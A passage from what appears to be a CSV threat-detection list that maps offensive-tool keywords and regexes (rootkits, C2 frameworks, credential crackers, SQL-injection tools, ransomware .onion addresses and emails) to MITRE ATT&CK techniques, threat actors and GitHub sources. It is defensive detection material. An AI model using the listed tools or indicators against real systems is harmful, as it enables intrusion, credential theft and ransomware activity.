T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","56197" "*r0oth3x49/ghauri*",".{0,1000}r0oth3x49\/ghauri.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","1","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","56198" "*r0oth3x49/Tor.git*",".{0,1000}r0oth3x49\/Tor\.git.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor 
proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","156","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z","56199" "*r0oth3x49@gmail.com*",".{0,1000}r0oth3x49\@gmail\.com.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#email","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","56200" "*r1cksec/thoth*",".{0,1000}r1cksec\/thoth.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","56201" "*r2pm -i dirtycow*",".{0,1000}r2pm\s\-i\sdirtycow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/nowsecure/dirtycow","1","0","N/A","N/A","N/A","1","93","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z","56202" "*r3F0rM47(listt*",".{0,1000}r3F0rM47\(listt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","56203" "*r4wd3r/RID-Hijacking*",".{0,1000}r4wd3r\/RID\-Hijacking.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence 
technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","56204" "*r4wd3r/Suborner*",".{0,1000}r4wd3r\/Suborner.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","9","5","469","58","2024-11-20T01:34:44Z","2022-04-26T00:12:58Z","56205" "*r77Rootkit%201.5.2.zip*",".{0,1000}r77Rootkit\%201\.5\.2\.zip.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","1","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","56206" "*Radare2*",".{0,1000}Radare2.{0,1000}","offensive_tool_keyword","Radare2","r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files. Radare project started as a forensics tool. a scriptable command-line hexadecimal editor able to open disk files. but later added support for analyzing binaries. disassembling code. debugging programs. 
attaching to remote gdb servers","T1057 - T1064 - T1059 - T1202","TA0002 - TA0008 - TA0001","N/A","N/A","Discovery","https://github.com/radareorg/radare2","1","0","N/A","N/A","N/A","10","21551","3061","2025-04-22T19:53:00Z","2012-07-03T07:42:26Z","56207" "*radius2john.pl*",".{0,1000}radius2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","56208" "*radius2john.py*",".{0,1000}radius2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","56209" "*RagingRotator-main.*",".{0,1000}RagingRotator\-main\..{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","56215" "*ragnar0k@ctemplar.com*",".{0,1000}ragnar0k\@ctemplar\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56216" "*ragnarjtm25k3w4cy6kvfttfhm24mpynikjt7yll5pvpfo4a7yuzweyd.onion*",".{0,1000}ragnarjtm25k3w4cy6kvfttfhm24mpynikjt7yll5pvpfo4a7yuzweyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection 
patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56217" "*ragnarmj3hlykxstyanwtgf33eyacccleg45ctygkuw7dkgysict6xyd.onion*",".{0,1000}ragnarmj3hlykxstyanwtgf33eyacccleg45ctygkuw7dkgysict6xyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56218" "*raheemabass55@gmail.com*",".{0,1000}raheemabass55\@gmail\.com.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#email","N/A","9","","N/A","","","","56219" "*RAI/ase_docker*",".{0,1000}RAI\/ase_docker.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 
- TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","56220" "*rai-attack-servers.*",".{0,1000}rai\-attack\-servers\..{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik 
Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","56221" "*Raikia/SMBCrunch*",".{0,1000}Raikia\/SMBCrunch.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","56222" "*RainbowCrack*",".{0,1000}RainbowCrack.{0,1000}","offensive_tool_keyword","RainbowCrack","The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one. which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called rainbow tables. It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. For downloads and more information. 
visit the RainbowCrack homepage","T1110 - T1027 - T1071 - T1090 - T1621","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://project-rainbowcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","56223" "*rai-redirector-dns*",".{0,1000}rai\-redirector\-dns.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","56224" 
"*rai-redirector-http*",".{0,1000}rai\-redirector\-http.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","56225" "*raiseChild.py -target-exec *",".{0,1000}raiseChild\.py\s\-target\-exec\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","56226" "*raiseChild.py*",".{0,1000}raiseChild\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","56227" "*rajkumardusad/onex*",".{0,1000}rajkumardusad\/onex.{0,1000}","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1105 - T1078 - T1059 - T1087","TA0007 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/rajkumardusad/onex","1","1","N/A","N/A","N/A","","N/A","","","","56228" "*rajkumardusad/Tool-X*",".{0,1000}rajkumardusad\/Tool\-X.{0,1000}","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. 
Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/rajkumardusad/Tool-X","1","1","#linux","N/A","N/A","","N/A","","","","56229" "*rakeem.osias@foreastate.com*",".{0,1000}rakeem\.osias\@foreastate\.com.{0,1000}","offensive_tool_keyword","Dispossessor","email used by the Dispossessor ransomware group notes for data exfiltration","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Data Exfiltration","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#email","N/A","10","10","N/A","N/A","N/A","N/A","56230" "*RalfHacker/Kerbeus-BOF*",".{0,1000}RalfHacker\/Kerbeus\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY 
- Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","56231" "*RalphDesmangles/22f580655f479f189c1de9e7720776f1*",".{0,1000}RalphDesmangles\/22f580655f479f189c1de9e7720776f1.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using the winreg named pipe","T1087 - T1018 - T1057","TA0007 - TA0008","N/A","N/A","Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","1","N/A","N/A","8","8","N/A","N/A","N/A","N/A","56232" "*RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD*",".{0,1000}RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56233" "*random_c2_profile*",".{0,1000}random_c2_profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","56234" "*random_c2profile.*",".{0,1000}random_c2profile\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - 
APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","56235" "*random_user_agent.params*",".{0,1000}random_user_agent\.params.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - 
Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","56236" "*random_user_agent.user_agent*",".{0,1000}random_user_agent\.user_agent.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth 